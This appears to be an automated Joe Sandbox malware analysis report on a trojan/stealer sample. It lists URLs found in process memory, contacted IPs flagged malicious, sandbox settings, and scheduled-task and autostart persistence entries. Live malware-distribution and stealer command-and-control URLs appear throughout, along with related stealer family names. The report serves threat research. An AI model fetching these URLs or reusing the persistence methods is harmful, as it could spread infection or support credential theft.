http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id21Response	RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id6ResponseD	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/inc/BitcoinCore.exe2	axplong.exe, 00000011.00000002.2518786518.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id13ResponseD	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/users/	wxfM3haI2K.exe, 0000001A.00000002.1943505648.0000000003330000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15Response	RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/	explorer.exe, 00000020.00000002.2539794352.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.2007562137.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegAsm.exe, 00000014.00000002.2071814033.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, XClient_protected.exe, 00000026.00000002.2519726609.00000000035F5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	stealc_default2.exe, 0000001F.00000003.2123301210.000000002D77D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9	RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded	axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000020.00000000.2015237887.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2271337810.000000000C44D000.00000004.00000001.00020000.00000000.sdmp, runtime.exe, 00000023.00000002.2070175435.0000000000420000.00000004.00000001.01000000.00000018.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.sb/ip	wxfM3haI2K.exe, 0000001A.00000002.1943505648.000000000326F000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000000.1925538885.0000000000742000.00000002.00000001.01000000.0000000E.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://yosoborno.com/mp/6HP	explorer.exe, 00000020.00000003.2271419290.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpData	stealc_default2.exe, 0000001F.00000002.2156458487.00000000010CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id1ResponseD	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.entrust.net/rpa03	axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, crypteda.exe.17.dr, GOLD[1].exe.17.dr	false	URL Reputation: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpic_qt	stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/inc/Set-up.exe=	axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	stealc_default2.exe, 0000001F.00000003.2018074074.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2192089803.0000000003186000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/inc/BitcoinCore.exe	axplong.exe, 00000011.00000002.2518786518.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.17/2fb6c2cc8dce150a.php&	stealc_default2.exe, 0000001F.00000002.2156458487.000000000112E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id24Response	RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	stealc_default2.exe, 0000001F.00000003.2018074074.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2192089803.0000000003186000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://yosoborno.com/bH	explorer.exe, 00000020.00000003.2271419290.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id21ResponseD	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.php6	stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000020.00000000.2007562137.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2539794352.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://yosoborno.com/tmp/ds	explorer.exe, 00000020.00000002.2549047522.000000000C12D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/inc/XClient_protected.exe	axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	stealc_default2.exe, 0000001F.00000002.2181996407.00000000275C3000.00000004.00000020.00020000.00000000.sdmp, JEBKKEGDBFIIEBFHIEHC.31.dr	false	URL Reputation: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.php.dll	stealc_default2.exe, 0000001F.00000002.2156458487.000000000112E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id10ResponseD	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5Response	RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2071814033.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, crypteda.exe.17.dr, GOLD[1].exe.17.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15ResponseD	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id10Response	RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpS	stealc_default2.exe, 0000001F.00000002.2156458487.000000000112E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id8Response	RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://fivexx5vs.top/	Set-up.exe, 00000022.00000003.2180595839.000000000014B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000002.2257502711.0000000000156000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000002.2257502711.000000000013E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpV	stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.s	wxfM3haI2K.exe, 0000001A.00000002.1943505648.000000000326F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpf	stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.micro	explorer.exe, 00000020.00000000.2005256952.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000002.2538694653.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.2004496675.0000000007C70000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpZ	stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/D	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/06/addressingex	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll9	stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
95.179.163.21	unknown	Netherlands	20473	AS-CHOOPAUS	true
65.21.18.51	unknown	United States	199592	CP-ASDE	true
46.100.50.5	yosoborno.com	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	true
154.216.18.223	unknown	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	false
195.133.48.136	fivexx5vs.top	Russian Federation	48347	MTW-ASRU	true
62.113.117.95	unknown	Russian Federation	48282	VDSINA-ASRU	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.17	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1499383
Start date and time:	2024-08-26 23:27:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	47
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PQ2AUndsdb.exe renamed because original name is a hash value
Original Sample Name:	f7b78fc6239775c67933713a1e65570e9be12c8b72a3225600112e4e40a81958.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@49/75@6/8
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 72% Number of executed functions: 423 Number of non-executed functions: 74
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, jSbXVBiItIINfreBHvLPHxDRe.jSbXVBiItIINfreBHvLPHxDRe, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target PQ2AUndsdb.exe, PID 6596 because it is empty
Execution Graph export aborted for target axplong.exe, PID 2516 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: PQ2AUndsdb.exe

Simulations

Behavior and APIs

Time	Type	Description
00:31:31	Task Scheduler	Run new task: Invitations path: wscript s>//B "C:\Users\user\AppData\Local\NeuraMind Innovations\MindLynx.js"
00:31:35	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url
00:31:38	Task Scheduler	Run new task: Firefox Default Browser Agent C7163E6344058F10 path: C:\Users\user\AppData\Roaming\whicctb
18:31:01	API Interceptor	87553x Sleep call for process: axplong.exe modified
18:31:20	API Interceptor	14x Sleep call for process: RegAsm.exe modified
18:31:21	API Interceptor	17x Sleep call for process: XBckuYbXje.exe modified
18:31:22	API Interceptor	1x Sleep call for process: runtime.exe modified
18:31:29	API Interceptor	3x Sleep call for process: Set-up.exe modified
18:31:29	API Interceptor	504x Sleep call for process: explorer.exe modified
23:27:57	Task Scheduler	Run new task: {E47962EA-AEB4-4A48-97FA-6A4DEC5AFD01} path:
23:28:07	Task Scheduler	Run new task: axplong path: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
95.179.163.21	file.exe	Get hash	malicious	Python Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse
	file.exe	Get hash	malicious	RedLine	Browse
	surp.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Cryptbot, PureLog Stealer, RedLine, Stealc, zgRAT	Browse
	file.exe	Get hash	malicious	Amadey, Cryptbot, Go Injector, PureLog Stealer, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Cryptbot, Go Injector, PureLog Stealer, RedLine, Stealc, Vidar	Browse
65.21.18.51	file.exe	Get hash	malicious	Python Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse
	file.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse
	surp.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, Stealc, Vidar	Browse
	fmHhWV67WS.exe	Get hash	malicious	RedLine	Browse
	file.exe	Get hash	malicious	Amadey, Cryptbot, PureLog Stealer, RedLine, Stealc, zgRAT	Browse
	file.exe	Get hash	malicious	Amadey, Cryptbot, Go Injector, PureLog Stealer, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	RedLine	Browse
46.100.50.5	4G6yVLS3wA.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	KqPElJNEtP.exe	Get hash	malicious	SmokeLoader	Browse	nidoe.org/tmp/index.php
	6t0abj5L0W.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5Systemz	Browse	nidoe.org/tmp/index.php
	SecuriteInfo.com.FileRepMalware.15116.31352.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc	Browse	nidoe.org/tmp/index.php
154.216.18.223	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse	154.216.18.223/setup2.exe
195.133.48.136	Set-up.exe	Get hash	malicious	Cryptbot	Browse	twoxc2vs.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Cryptbot	Browse	twoxc2vs.top/v1/upload.php
	Setup.exe	Get hash	malicious	Cryptbot	Browse	tenxc10pt.top/v1/upload.php
	Setup.exe	Get hash	malicious	Cryptbot	Browse	tenxc10pt.top/v1/upload.php
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse	fivexx5ht.top/v1/upload.php
	surp.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, Stealc, Vidar	Browse	fivexx5ht.top/v1/upload.php
